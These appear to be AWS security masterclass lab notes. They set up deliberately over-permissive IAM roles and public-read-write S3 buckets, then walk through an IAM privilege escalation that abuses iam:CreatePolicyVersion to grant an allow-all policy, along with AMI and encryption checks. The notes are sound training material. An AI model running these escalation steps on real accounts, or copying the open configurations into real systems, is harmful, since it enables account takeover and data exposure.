#overly permissive IAM roles
aws iam create-user --user-name s3ReadUser --tags Key=createdFor,Value=masterclass --profile masterclass aws iam attach-user-policy --user-name s3ReadUser --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess --profile masterclass
aws iam create-user --user-name EC2DescribeOnlyUser --tags Key=createdFor,Value=masterclass --profile masterclass aws iam attach-user-policy --user-name EC2DescribeOnlyUser --policy-arn arn:aws:iam::aws:policy/AmazonEC2ReadOnlyAccess --profile masterclass aws iam create-group --group-name EC2ManagementUsers --profile masterclass aws iam attach-group-policy --group-name EC2ManagementUsers --policy-arn arn:aws:iam::aws:policy/AmazonEC2FullAccess --profile masterclass aws iam add-user-to-group --user-name EC2DescribeOnlyUser --group-name EC2ManagementUsers --profile masterclass
aws iam create-role --role-name EC2RDSReadRole --assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ec2.amazonaws.com"},"Action":"sts:AssumeRole"}]}' --tags Key=createdFor,Value=masterclass --profile masterclass aws iam attach-role-policy --role-name EC2RDSReadRole --policy-arn arn:aws:iam::aws:policy/AmazonRDSFullAccess --profile masterclass aws iam attach-role-policy --role-name EC2RDSReadRole --policy-arn arn:aws:iam::aws:policy/IAMFullAccess --profile masterclass aws iam attach-role-policy --role-name EC2RDSReadRole --policy-arn arn:aws:iam::aws:policy/AmazonEC2FullAccess --profile masterclass
#iam privilege escalation using policy version rollback , we can set default policy as well to previous version and escalate
Run an admin command like list-users to see that the limiteduser has no access
aws iam list-users --profile masterclasslimiteduser
Identify the policies attached to the user using the new profile with AWS CLI
aws iam list-attached-user-policies --user-name limiteduser --profile masterclasslimiteduser
Get the version of the identified policy - policyversionmanager
aws iam get-policy --policy-arn POLICY-ARN --profile masterclasslimiteduser
Get the permissions attached to the policy for version v1 - policyversionmanager
aws iam get-policy-version --policy-arn POLICY-ARN --version-id v1 --profile masterclasslimiteduser
One of the permissions attached is "iam:CreatePolicyVersion"
We can use this to create a new version of the attached policy with privileged access
aws iam create-policy-version --policy-arn POLICY-ARN --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"","Resource":""}]}' --set-as-default --profile masterclasslimiteduser
Run an admin command now to confirm your privileges have escalated to AWS AdministratorAccess
aws iam list-users --profile masterclasslimiteduser
#iam privilege escalation based on groups
![image](https://private-user-images.githubusercontent.com/8140763/288749566-de94a793-2c5f-46ea-874b-20af2817c4c1.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODc0OTU2Ni1kZTk0YTc5My0yYzVmLTQ2ZWEtODc0Yi0yMGFmMjgxN2M0YzEucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9N2QxYmQyODUxMDc0YmVkZWQzNTc2ZDE3ZGZlYmM2YWNkMTQzMTcyZjExODA5MmZjZTE3ODhlZmZiMWJmMWRjYiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.nSlABbdJyrGkUis19Tm7zxc7fP16qqdpYX-NwYrP6gg)
AMI catalog:
https://us-east-1.console.aws.amazon.com/ec2/home?region=us-east-1#AMICatalog:
From console we can see the public AMI's which might be backdoor ami's as well.
Navigate to EC2 > AMI Catalog and find the “masterclass” AMI under Community AMIs
For AWS CLI ...
Run the following command to find AMIs belonging to the account 511522223657
aws ec2 describe-images --owners 511522223657 --profile masterclass
aws ec2 describe-images --owners 511522223657 --query 'Images[*].[ImageId, Name, PlatformDetails]' --profile masterclass
aws ec2 describe-images --filters "Name=name,Values=session5-warfare" --profile masterclass
![image](https://private-user-images.githubusercontent.com/8140763/288751749-d8511ce2-59b4-4bcc-b1d6-0d9398ea592d.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODc1MTc0OS1kODUxMWNlMi01OWI0LTRiY2MtYjFkNi0wZDkzOThlYTU5MmQucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9NzM1MTgwYjJjY2M2NDRkMzg4NmMwZmQxZDI3ZmU2ZGQxMmVkZWQzMzczZTdiYjdmM2YyZTI1NDdlYjg0MWI0ZiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.1Ryr-Weta1JHKeI52ox2fkdySaQBroPubPovHbYsP6o)
![image](https://private-user-images.githubusercontent.com/8140763/288751841-a07c4d3c-36e9-44ad-b621-acfe884e94dd.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODc1MTg0MS1hMDdjNGQzYy0zNmU5LTQ0YWQtYjYyMS1hY2ZlODg0ZTk0ZGQucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9ZjhhZWRhZDBhMmEyODUzNDk5NGZiMzZkMGQ3MTYzMDYwY2JiYmE1YjMyZjIwYjQ2NmE4ODQ5ZjI1MDViYjFhZCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.WbSE1e1yJzMqlG7YeN9sQh856d4fXYab5qoGDbrVYko)
#use instance id to see if volume is encrypted or not
Use the instance id to enumerate attached volumes (also visible in the UI)
aws ec2 describe-instances --instance-ids --query "Reservations[].Instances[].BlockDeviceMappings[].Ebs[].VolumeId" --region us-east-1 --profile masterclass
aws ec2 describe-volumes --volume-ids --query "Volumes[].Encrypted" --region us-east-1 --profile masterclass
#Use the snapshot id to check for encryption status (also visible in the UI)
aws ec2 describe-snapshots --snapshot-ids snap-043dabe339601b7a0 --query "Snapshots[].Encrypted" --region us-east-1 --profile masterclass
#ec2 misconfigurations
![image](https://private-user-images.githubusercontent.com/8140763/288757677-341e1b48-6063-4f1a-a3aa-dc2aa3ffaefe.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODc1NzY3Ny0zNDFlMWI0OC02MDYzLTRmMWEtYTNhYS1kYzJhYTNmZmFlZmUucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9MjhjNmM4ZjIyMWM1OWJlYjgzNzExNjhkMDU2YzVkYjU1MWVhZGJlNDQ5MjMyYTAwZTY5Zjg1NTZiYTcyNzE4MiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.JpuuxichIswp3MrauDTn8Ok6HQzaW3KyZSY8YUr-jh4)
![image](https://private-user-images.githubusercontent.com/8140763/288757887-2f81069d-4c07-4f95-b60f-615e345e6101.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODc1Nzg4Ny0yZjgxMDY5ZC00YzA3LTRmOTUtYjYwZi02MTVlMzQ1ZTYxMDEucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9NDY5MTFiNDYzYmZiYTM2NTUxMjE2ZjZmNDdmNjYwNmU5ZDQzY2UyOTFjNzM1M2EyYjY4YmM1MTI5ODdhMTNjYiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.7LvcSnzX8f_U7vRjDOOjbcJ3tiuXZUECZSGEe6Sy3dE)
Check the security groups for inbound rules
![image](https://private-user-images.githubusercontent.com/8140763/288758026-550d911f-8cd7-49d5-8540-d8f69d246e06.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODc1ODAyNi01NTBkOTExZi04Y2Q3LTQ5ZDUtODU0MC1kOGY2OWQyNDZlMDYucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9Y2Y4NWY0Y2QwM2NjZmY3ODUyZTNkMmE0MzJiY2Q2NTQxZDQyMzkwOGFhMjZhMDZkNDBiMTY0YTg1NjgzOWQxNyZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.DJdBtJfvh0EOn5hBhxkIrtIsalyqSYOCsAy832GUhqw)
SSRF using IMDS
![image](https://private-user-images.githubusercontent.com/8140763/288758232-78731613-b1db-4dc1-8cbb-f6f1c92bd2b1.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODc1ODIzMi03ODczMTYxMy1iMWRiLTRkYzEtOGNiYi1mNmYxYzkyYmQyYjEucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9ZDQ4NTBkZmQ1MjYwMGMxOWM2ZDc3NjdkNTc5ZjQ4OTZmNmJmNGVlMTA0MWJjMTMxZjBhNTEyNDI0ZmFhOGVkOSZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.6lAEVDSM4iF9rlkA5ZAA0DwoO2NtMQCGlNOlYRwtxbo)
Access and passrole , using policy version
![image](https://private-user-images.githubusercontent.com/8140763/288750060-c8c0d36f-a6c8-4c24-a95a-c78506ae394d.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODc1MDA2MC1jOGMwZDM2Zi1hNmM4LTRjMjQtYTk1YS1jNzg1MDZhZTM5NGQucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9NzNhZDc1Nzk1YzE3ZmQ5N2FkMDY2MjhjMWFiYzQyM2IyN2Q0Mjc2ZjQ4N2M5YzYxYzZkZmRlOTQ5NWUxNjRkZiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.9eSjZ47SPlhZdMrnM_OjT1YJtFU63BiQNusr2xsLHGE)
#s3 bucket
export UNAME=curl -s http://x41.co/random.php
export bucketname=$UNAME-public-bucket
aws s3api create-bucket --bucket $bucketname --region us-east-1 --profile masterclass aws s3api put-public-access-block --bucket $bucketname --public-access-block-configuration "BlockPublicPolicy=false" --profile masterclass aws s3api put-bucket-ownership-controls --bucket $bucketname --ownership-controls="Rules=[{ObjectOwnership=BucketOwnerPreferred}]" --profile masterclass wget https://aws-masterclass-data.s3.amazonaws.com/session3/boat.jpg wget https://aws-masterclass-data.s3.amazonaws.com/session3/public.txt aws s3api put-object --bucket $bucketname --key boat.jpg --body boat.jpg --profile masterclass aws s3api put-object --bucket $bucketname --key public.txt --body public.txt --profile masterclass aws s3api put-bucket-acl --bucket $bucketname --acl public-read-write --profile masterclass
export objbucketname=$bucketname-public-objects
aws s3api create-bucket --bucket $objbucketname --region us-east-1 --profile masterclass aws s3api put-public-access-block --bucket $objbucketname --public-access-block-configuration "BlockPublicPolicy=false" --profile masterclass aws s3api put-bucket-ownership-controls --bucket $objbucketname --ownership-controls="Rules=[{ObjectOwnership=BucketOwnerPreferred}]" --profile masterclass aws s3api put-object --bucket $objbucketname --key boat.jpg --body boat.jpg --profile masterclass aws s3api put-object --bucket $objbucketname --key public.txt --body public.txt --profile masterclass aws s3api put-bucket-acl --bucket $objbucketname --acl public-read-write --profile masterclass aws s3api put-bucket-policy --bucket $objbucketname --policy "{"Version":"2012-10-17","Statement":[{"Sid":"PublicRead","Effect":"Allow","Principal":"","Action":["s3:GetObject"],"Resource":["arn:aws:s3:::$objbucketname/"]}]}" --profile masterclass
export aclrwbucket=$UNAME-bucket-acl-rw
aws s3api create-bucket --bucket $aclrwbucket --region us-east-1 --profile masterclass aws s3api put-bucket-ownership-controls --bucket $aclrwbucket --ownership-controls="Rules=[{ObjectOwnership=BucketOwnerPreferred}]" --profile masterclass aws s3api put-public-access-block --bucket $aclrwbucket --public-access-block-configuration "BlockPublicPolicy=false" --profile masterclass aws s3api put-bucket-acl --bucket $aclrwbucket --grant-read-acp uri=http://acs.amazonaws.com/groups/global/AllUsers --grant-write-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers --profile masterclass
![image](https://private-user-images.githubusercontent.com/8140763/288757246-f1f3dce0-8461-4408-9421-bb2f658f90cf.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODc1NzI0Ni1mMWYzZGNlMC04NDYxLTQ0MDgtOTQyMS1iYjJmNjU4ZjkwY2YucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9ODQxNDkwN2JhYmQ5NDJjMGVmMTY5ZGU4OTIyZGVhODhkZTM0MzRlMjJkYzM2NmNiZjQ5MGU4MGYwZjcwYTVkZCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.zVfl_3PCy326C_XIZXqP3C33pAoK9KiB6a0rBgChrHs)
![image](https://private-user-images.githubusercontent.com/8140763/288923909-c85e8e71-1a8d-4c14-834a-1763eae46e82.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODkyMzkwOS1jODVlOGU3MS0xYThkLTRjMTQtODM0YS0xNzYzZWFlNDZlODIucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9ZTM3MDE3ODFkZmIxZmVjMWJhMDg0ZDgyNmY0MzlhNzllMTY4MGM0YmI5YmJmYWIyZjkwMGY5Y2JmMTJjNmUxNiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.mdlwX86AHqWL1_txCHr_2lmmL2x5yjw1Nr3-X8nBgfw)
![image](https://private-user-images.githubusercontent.com/8140763/288923985-79aba158-0678-481c-b9ac-42b9cbb31088.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODkyMzk4NS03OWFiYTE1OC0wNjc4LTQ4MWMtYjlhYy00MmI5Y2JiMzEwODgucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9MGNmMjU3Yzk3NTkyZWIwZGIzM2VmMTljNmVjMDhkM2I5NThkZWRmOTU5NGY0YmZjOWFhYWE0ODFkOTM3NWE5ZCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.fjROerGlWFGDC6bnKaVvLJWFss_6FLX213BUoQUVmLA)
![image](https://private-user-images.githubusercontent.com/8140763/288924329-0f57a7db-02d8-4430-991f-8a5f5878b343.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODkyNDMyOS0wZjU3YTdkYi0wMmQ4LTQ0MzAtOTkxZi04YTVmNTg3OGIzNDMucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9NGUxNWMwYzE2NWI4MDEzMWJhMTQ2NWFhMTczYzFjYjkwYmRkNDYwZGQ0YjcwNDYxMmRhMTZjZTVkNTYxN2Q5ZCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.Ely71-FyWh7uHMDusBvaUfgZjcWWrJbdNkfy2ds_47Q)
![image](https://private-user-images.githubusercontent.com/8140763/288924421-8b88ffea-7583-4ab4-9f9c-c869fdf8f258.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODkyNDQyMS04Yjg4ZmZlYS03NTgzLTRhYjQtOWY5Yy1jODY5ZmRmOGYyNTgucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9ZGM1NjYzYzY5ZThjYzRkMzMxNzU4ODRjZDc0ODVmZDJlYjEwMTdhNTI3Nzk1ODI5OThmMWE1MGExZTNkZGNkNyZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.P61lbCmD1N8Laldao3CYjjI08ZfgM3CFa0ZX1qhuOe8)
![image](https://private-user-images.githubusercontent.com/8140763/288925053-2deac7d1-a92e-4735-a155-f45391ea6b2c.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODkyNTA1My0yZGVhYzdkMS1hOTJlLTQ3MzUtYTE1NS1mNDUzOTFlYTZiMmMucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9MDc1ZWJmZGYxZjBiNTNjM2NmMDBiMzI1MTBiM2NmY2Q5ZTZjYWQ1MGNmZmFkYzJhNjQ2ZjQzOGIyODJiZWYxNiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.9BEzvOHZYjiCAQD3VGTUCwjJnNzbEwHjzchi7agyRmg)
![image](https://private-user-images.githubusercontent.com/8140763/288925170-8041851e-4a53-43ca-964f-6db9db9cc3d2.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODkyNTE3MC04MDQxODUxZS00YTUzLTQzY2EtOTY0Zi02ZGI5ZGI5Y2MzZDIucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9MGQwMjA3ZTZlNTc1YzUwNjY4MjcxMDEyZmQ5NWUzOWVhMTdhMjUzZjAyMzNlOWJmZWM4YWIwMTZhNmYyMzQ0NyZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.An_Pv1oezdZjRdQSOMDdO0KXZ1-3BGgQOqsc09xKBjg)
![image](https://private-user-images.githubusercontent.com/8140763/288925297-30d12520-3491-4482-a0ef-a856dcbbbcd3.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjE2Mzk2MjYsIm5iZiI6MTcyMTYzOTMyNiwicGF0aCI6Ii84MTQwNzYzLzI4ODkyNTI5Ny0zMGQxMjUyMC0zNDkxLTQ0ODItYTBlZi1hODU2ZGNiYmJjZDMucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDcyMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA3MjJUMDkwODQ2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9NDZiNjU4NDA4ZGI4ZmZiMjZkOTAwM2I1MTE1MDAxMjcwZmZlOGY5ZTdkZWM3MjljMjE3YzJmMGE0MWI2NmM2YyZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.S-x1iHCDrjQfR1X82mJQQXhawNkcJ_mTqyR3hJaeRqs)
